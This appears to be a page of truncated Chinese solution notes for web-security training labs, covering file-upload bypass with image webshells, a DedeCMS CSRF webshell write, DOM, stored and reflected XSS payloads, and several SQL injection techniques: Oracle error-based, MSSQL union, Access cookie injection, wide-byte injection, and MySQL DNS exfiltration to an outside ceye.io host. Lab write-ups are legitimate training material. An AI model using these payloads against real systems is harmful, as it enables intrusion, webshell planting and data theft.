小021-7文件解析上传漏洞靶场1-10-解题笔记
7文件解析上传漏洞靶场1-10 7.1 通过源码发现这个是前段过滤,所以先抓包正常上传1.jpg 然后通过修改发送包1.php成功上传7.2 通过源码知道这个是通过Content-Type (内容类型)和文件头检测的,利用cmd 命令 copy a.jpg/b + 1.txt 123.jpg合成一张图片码上传通过验证抓包修改文件名后缀php成功上传 &
小021-3、CSRF跨站伪造请求 - 屠龙宝刀点击就送-解题笔记
打开靶场,提示后台密码admin123打开网站发现是DedeCMS_V57_UTF8_SP1,然后去找该版本通杀漏洞https://xz.aliyun.com/t/2237通过/dede/sys_verifies.php 这个文件可以写入一句话,然后http://117.41.229.122:8010/csrf/uploads/dede/sys_verifies.php?action=
小021-9.3、DOM XSS靶场-解题笔记
1 打开聊天室,习惯性的输入的?id=1 发现页面上有输出 有document.write参数可以利用2 测试弹窗 ?id=1<img src=a onerror=alert(1)> 成功弹出13 然后添加 xss语句 DOM是吃编码的,所以转换了?id=1 \u003c\u0073\u0063\u0072\u0069\u007
小021-9.2、存储型Xss靶场-解题笔记
通过查找靶场源码FineCMS公益软件 v5.3.0 存储型XSS 找到https://www.jianshu.com/p/200ea62486d9查看文章知道有 留言和错误日志漏洞http://117.41.229.122:8082/index.php?c=mail&m=test<img src=a onerror=alert(1)> 成功弹窗,然后植入http:
小021-9.1、反射型XSS靶场-解题笔记
'号闭合' oninput=alert`123`//
小021-5.4.1、Oracle注入- 报错注入-解题笔记
1. ' and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1))-- 查询数据库版本2. ' and 1=ctxsys.drithsx.sn(1,(select TABLE_NAME from user_tables w
小021-5.3.1、MSSQL注入 - 反弹注入-解题笔记
显错注入 1. ' order by 3-- 3个字段2. ' and 1=2 union all select null,null,null from admin-- id Title Body3.' and 1=2 union all select id,name,null from
小021-5.2.2、MYSQL 注入 - Dns注入-解题笔记
1. 查库名 /1.txt?id=1 and (SELECT LOAD_FILE(CONCAT('\\\\',(select database()),'.22l9qv.ceye.io\\abc'))) 获取到 数据库名= mangzhu2. 查表名 /1.txt?id=1 and (SELEC
小021--5.1.2、Access注入 — 偏移注入--解题笔记
一开始用新闻失败了,新闻一共才 10个字段 没有admin表字段多,然后改成产品的 ,id=105用cookie注入 查 字段数document.cookie="id="+escape("105 order by 26");慢慢测试 admin有几个字段document.cookie="id="+escape("105 unio
小021-6.3.1-6.3.3-SQL注入-宽字节注入Rank 1-3 --解题笔记
6.3.11 http://120.203.13.75:8150/New/WidecharBased/RankOne/sql-one/?id=1%df' order by 4%23 order by 3 4 查出 3个字段2 http://120.203.13.75:8150/New/WidecharBased/RankOne/s